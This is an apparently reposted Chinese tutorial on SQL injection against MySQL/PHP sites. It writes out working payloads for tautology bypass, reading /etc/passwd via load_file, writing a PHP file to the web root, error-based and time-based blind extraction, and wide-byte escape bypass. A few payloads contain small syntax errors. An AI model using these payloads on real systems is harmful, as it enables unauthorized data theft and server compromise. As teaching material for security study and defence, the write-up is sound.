浅谈SQL注入

先看一个sql语句：

select * from admin where username='(此处为用户输入的数据)';

在没有任何过滤的状况下，若是用户输入：' or 1=1 --

这条语句就为：select * from admin where username='' or 1=1 --';

可见，语句执行永远为真。此时就进行了sql注入。

SQL注入有以下分类：

1、数字型注入

初始参数为：id=1

能够构造：id=1 or 1=1 （语句执行永远为真）

id=1 and 1=2 (语句执行永远为假)

id=1' (语句执行会出错)

数字型注入较为简单，并且通常在PHP，ASP等弱类型语言中存在，而对于Java，C#等强类型语言通常不存在。

2、字符型注入

字符型注入首先想到的是闭合单引号。

不难想到：id=1' and 1=2 --

-- 是注释后边的语句。

3、其余注入

sql注入其实能够说就是字符型注入和数字型注入。

还有一些常见的注入，如：

POST注入：注入字段在POST数据中。

Cookie注入：注入字段在Cookie字段中。

延时注入：使用数据库延时特性注入。

base64注入：注入字符串须要通过base64加密。

4、Mysql特性

mysql是一种数据库。

（1）三种注释：

#：注释从“#”字符到行尾。

--：注释“-- ”序列到行尾。注意：“-- ”后面要加一个空格。

/**/:注释/*  XXXX */中间的字符。

/**/注释存在一个特色：select id /*!55555,username*/ from users

语句正常执行。/*!55555,username*/的意思是若Mysql版本号高于或者等于5.55.55，语句将会被执行。若是“！”后面不加入版本号，将直接执行sql语句。

（2）mysql函数利用

load_file()函数读文件

读取文件，文件必须在服务器上，文件必须为绝对路径，必须有权限，文件容量小于         max_allowed_packet字节（默认为16MB，最大为1GB）,如：

union select 1,load_file('/etc/passwd'),3,4,5,6 #

绕过单引号：union select 1,load_file(字符串转换为十六进制),3,4,5,6 #

union select 1,load_file(char(XX,XX,XX........)),3,4,5,6 #   ascii码

into outfile写文件操做

必须持有权限，文件名为绝对路径。

如：select '<?php phpinfo(); ?>' into file 'c:\wwwroot\1.php'

绕过单引号：select char(XX,XX,XX.......) into file 'c:\wwwroot\1.php'

concat 链接字符串

concat(user(),0x2c,database())

concat_ws(0x2c,user(),database())       0x2c是 逗号的16进制。

5、Mysql报错注入

（1）updatexml

select * from admin where id=1 and updatexml(1,(concat(0x7c,(select @@version))),1);

结果返回一个错误：'|5.1.50-community-log'

(2)extractvalue

select * from admin where id=1 and extractvalue(1,concat(0x7c,(select user())));

结果返回一个错误：'|root@localhost'

(3)floor

select * from admin where id = 1 union select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b

结果返回：Duplicate entry '1root@localhost' for key 'group_key'

6、宽字节注入

若是PHP开启了魔术引号，就会将单引号，双引号，反斜杠和NULL字符加上反斜杠转义。

如：id='   会输出    \'

这时咱们能够使用宽字节注入：id=%d5'     输出：誠'   注入成功。

咱们将  誠 进行url编码：%d5%5c

而 \的url编码为：%5c   可见 ，繁体字将反斜杠吃掉了。这就是宽字节注入的原理。

7、长字符截断

原理很简单。

好比在数据库建立三个以下用户：

admin   (有三个空格)

admin     (有五个空格)

admin       (有七个空格)

三个用户名长度不同，可是若是 查询admin用户名，三个用户名都会被查询到。

假设后台语句是：

select count(*) from users where username='admin' and password='******';

这是存在安全问题的，若是用户建立一个“admin          ”用户，便可轻易进入后台，著名的wordpress就被这样的方式攻击过。

8、延时注入

基于时间差别的盲注手段。延时注入须要用到sleep()函数。

如：select * from users where id = 1 and sleep(3)    #三秒后执行sql语句。

也能够判断是否存在注入：url+id=1 and sleep(3)  页面三秒左右打开，则存在注入。

一般 会采用和 if 函数 搭配使用，进行爆破字符串。

如： and if(hex(mid(user(),L,1)))=N,sleep(3),1)

L的位置表明字符串的第几个字符，N表明ASCII码。

执行成功，则三秒左右返回页面，不然，和原来相同。

 

 

 

ps：坚持，努力，为梦想奋斗。